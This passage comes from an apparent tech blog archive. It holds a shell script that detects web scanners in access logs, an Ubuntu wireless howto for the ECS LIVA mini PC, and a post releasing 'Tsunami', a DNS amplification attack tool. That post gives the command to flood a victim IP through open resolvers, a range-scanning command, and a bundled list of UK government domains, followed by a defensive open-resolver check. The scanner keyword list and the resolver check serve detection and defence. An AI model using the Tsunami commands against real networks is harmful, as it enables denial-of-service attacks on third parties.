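ACCESS_LOG='203.0.113.7 - - [18/Jul/2014:10:01:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"
203.0.113.9 - - [18/Jul/2014:10:01:05 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000001)"
203.0.113.9 - - [18/Jul/2014:10:01:05 +0000] "GET /phpMyAdmin/ HTTP/1.1" 404 209 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000002)"
198.51.100.4 - - [18/Jul/2014:10:01:40 +0000] "GET /login.php?id=1%27 HTTP/1.1" 404 209 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.23 - - [18/Jul/2014:10:02:00 +0000] "GET /wp-login.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1) Chrome/36.0"
198.51.100.23 - - [18/Jul/2014:10:02:01 +0000] "GET /administrator/ HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1) Chrome/36.0"
198.51.100.23 - - [18/Jul/2014:10:02:02 +0000] "GET /.git/HEAD HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1) Chrome/36.0"
198.51.100.23 - - [18/Jul/2014:10:02:03 +0000] "GET /backup.zip HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1) Chrome/36.0"
203.0.113.7 - - [18/Jul/2014:10:03:00 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"'

# scanner_hits LOG: sorted list of client IPs whose User-Agent names a known
# scanner. Splitting on double quotes puts the User-Agent in field 6.
scanner_hits() {
    printf '%s\n' "$1" | awk -F'"' '
        tolower($6) ~ /nikto|sqlmap|nessus|openvas|w3af|acunetix|dirbuster|masscan/ {
            split($1, f, " "); seen[f[1]] = 1
        }
        END { for (ip in seen) print ip }' | sort
}

# noisy_404_clients LOG MIN: client IPs with at least MIN "404" responses and
# their counts. Path guessing produces many 404s whatever the User-Agent says.
noisy_404_clients() {
    printf '%s\n' "$1" | awk -F'"' -v min="$2" '
        { split($1, f, " "); split($3, s, " "); if (s[1] == "404") n[f[1]]++ }
        END { for (ip in n) if (n[ip] >= min) print ip, n[ip] }' | sort
}

echo "Known scanner User-Agents seen from:"; scanner_hits "$ACCESS_LOG"
echo "Clients with 3 or more 404 responses:"; noisy_404_clients "$ACCESS_LOG" 3
```

The first check is what an IDS signature on the HTTP User-Agent does; the second is the kind of per-IP threshold that a web server's automatic ban feature or a fail2ban jail acts on, and it is the one that still works when the scanner hides behind a browser User-Agent. A legitimate client that 404s on favicon.ico stays below the threshold.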

That's all! See you.

Tuesday, July 15, 2014

Thursday, July 03, 2014

HOWTO : ECS LIVA Mini PC Kit on Ubuntu 14.04 LTS

The ECS Liva Mini PC kit is the smallest x86 PC in the world so far. The BIOS is UEFI, so only Ubuntu, besides Windows 8.1, can be installed on it. I chose to install with LVM.

You may need a powered USB hub to connect the keyboard and mouse as well as the install device (such as a USB DVD-ROM or USB pendrive). Since it comes with a 32GB/64GB eMMC (SSD drive), you may need to connect an external hard drive for more storage.

The maximum power consumption is about 12W under Ubuntu 14.04 LTS.

The sound and network devices work out of the box. However, the wireless and bluetooth devices do not work properly even if you download the wireless driver from the official site (it is still beta at the moment).

After some tries and failures, I finally made the wireless device work. However, the bluetooth device does not work at the moment.

How did I make the wireless device work? Here you are :

Step 1 :

Write down the MAC address of the wireless card.

Step 2 :

Download the beta driver from the official site. Extract it and go to ~/Downloads/Ubuntu/WLAN.

Rename "brcmfmac-sdio.txt" to "brcmfmac43241b4-sdio.txt".

mv brcmfmac-sdio.txt brcmfmac43241b4-sdio.txt

Change the "macaddr" at brcmfmac43241b4-sdio.txt to the previous written down MAC address.

e.g. macaddr=24:0a:64:4c:43:34

Step 3 :

Move the /lib/firmware/brcm directory to another place.

sudo mv /lib/firmware/brcm ~/Downloads/

Step 4 :

Install git package.

sudo apt-get install git

Download the wireless firmware.

cd ~/Downloads
git clone git://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git


After that copy the ~/Downloads/linux-firmware/brcm to /lib/firmware/.

sudo cp -R ~/Downloads/linux-firmware/brcm /lib/firmware/

Copy the brcmfmac43241b4-sdio.txt to /lib/firmware/brcm/.

sudo cp ~/Downloads/Ubuntu/WLAN/brcmfmac43241b4-sdio.txt /lib/firmware/brcm/

Step 5 :

Comment out the blacklist.

sudo nano /etc/modprobe.d/blacklist.conf

Locate "blacklist bcm43xx" and make it to "#blacklist bcm43xx".

Step 6 :

Reboot the box.

However, the wifi signal is not very strong indeed.

Remarks

You may need to make some changes on the box with the following packages :

sudo apt-get install libavcodec-extra
sudo apt-get install indicator-cpufreq


To increase the performance, you should NOT use SWAP.

sudo nano /etc/rc.local

Insert the following before "exit 0" :

sysctl -w vm.swappiness=0

Then, reboot your box.

For the video playback, you are required to install the following packages.

sudo add-apt-repository ppa:sander-vangrieken/vaapi
sudo apt-get update
sudo apt-get install mplayer-vaapi gstreamer1.0-vaapi gstreamer1.0-libav libva-intel-vaapi-driver vainfo mencoder-vaapi


That's all! See you.

Link : 10 things to do after installing Ubuntu


Wednesday, July 02, 2014

Tsunami - DNS Amplification Attack Tool

Tsunami is a DNS Amplification Attack Tool which was collected from the internet and modified by Samiux. It is designed for testing your server and/or network under a DNS Amplification Attack. Performing this test on any server and/or network without authorization is a crime and you will be put in jail.

The number of open recursive DNS servers, the attacker's bandwidth and the duration of the attack may affect the traffic volume of the attack.

Tsunami works perfectly on Kali Linux 1.0.7 or above. The official site is here.

Usage



To perform DNS Amplification attack :

python amplfiy.py -t 1.2.3.4 -s open_dns.txt -a domain_name.txt -c -1 --verify -v --threads=1000

*where 1.2.3.4 is the victim's IP address

To scan for the open recursive DNS server :

perl find_open_resolvers.pl '1.0.0.0 - 1.84.255.255' -q 1000

Remarks : this script can only check whether the DNS server has the RA flag set. You need to double check with the following command to confirm that the scanned DNS server is a true open recursive DNS server.

dig ANY isc.org @samsung.idv.tw

*where samsung.idv.tw is the open recursive DNS server
and isc.org is the domain to look up
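Before worrying about other people's open resolvers, check that your own DNS server is not one, since it would otherwise be used to flood somebody else. The following is an added example (shell, not part of Tsunami) that parses the output of the "dig ANY <domain> @<server>" check above: it reports "open" when the RA flag is set and answers actually came back, and estimates the amplification factor from the response size. Both dig outputs are constructed; the query-size estimate is an assumption described in the comments.

```shell
#!/bin/sh
# Added example, not part of Tsunami: read what dig prints for
# "dig ANY <domain> @<server>", decide whether the server is an open
# recursive resolver, and estimate how much a reflected ANY query is
# amplified. Both outputs are constructed: the first is an open resolver,
# the second refuses recursion.
DIG_OPEN='; <<>> DiG 9.9.5 <<>> ANY isc.org @192.0.2.53
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4242
;; flags: qr rd ra; QUERY: 1, ANSWER: 27, AUTHORITY: 0, ADDITIONAL: 1
;; Query time: 38 msec
;; MSG SIZE  rcvd: 3231'

DIG_CLOSED='; <<>> DiG 9.9.5 <<>> ANY isc.org @192.0.2.54
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 4243
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; Query time: 12 msec
;; MSG SIZE  rcvd: 36'

# resolver_status DIG_OUTPUT: "open" when the RA flag is set and the server
# returned answers for a name it is not authoritative for, else "closed".
resolver_status() {
    printf '%s\n' "$1" | awk '
        /^;; flags:/ {
            ra = ($0 ~ /flags:[^;]* ra[ ;]/)
            for (i = 1; i <= NF; i++)
                if ($i == "ANSWER:") { answers = $(i + 1); sub(/,/, "", answers) }
        }
        END { status = (ra && answers + 0 > 0) ? "open" : "closed"; print status }'
}

# amplification_factor DIG_OUTPUT QNAME: response bytes divided by the query
# size. The query size is an estimate (assumption): 12-byte header, the
# encoded name (length + 2), 4 bytes of type/class and dig's 11-byte EDNS
# OPT record.
amplification_factor() {
    rcvd=$(printf '%s\n' "$1" | awk '/^;; MSG SIZE/ { print $NF }')
    qsize=$(( 12 + ${#2} + 2 + 4 + 11 ))
    echo $(( rcvd / qsize ))
}

echo "192.0.2.53: $(resolver_status "$DIG_OPEN"), amplification x$(amplification_factor "$DIG_OPEN" isc.org)"
echo "192.0.2.54: $(resolver_status "$DIG_CLOSED")"
```

Run the real dig from an address outside your network against your own resolver. If the result is "open", restrict recursion to your own clients (for BIND, the allow-recursion option) and consider response rate limiting; an ANY answer of a few kilobytes for a 36-byte query is exactly the ratio an amplification attack relies on.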

Tsunami comes with the following files :

amplfiy.py - the attack script
find_open_resolvers.pl - the scanner script
gov-uk_domain.txt - domain names of UK Government
open_dns_1.0.0.0-1.84.255.255.txt - open recursive DNS list within 1.0.0.0 and 1.84.255.255 IP range

That's all! See you.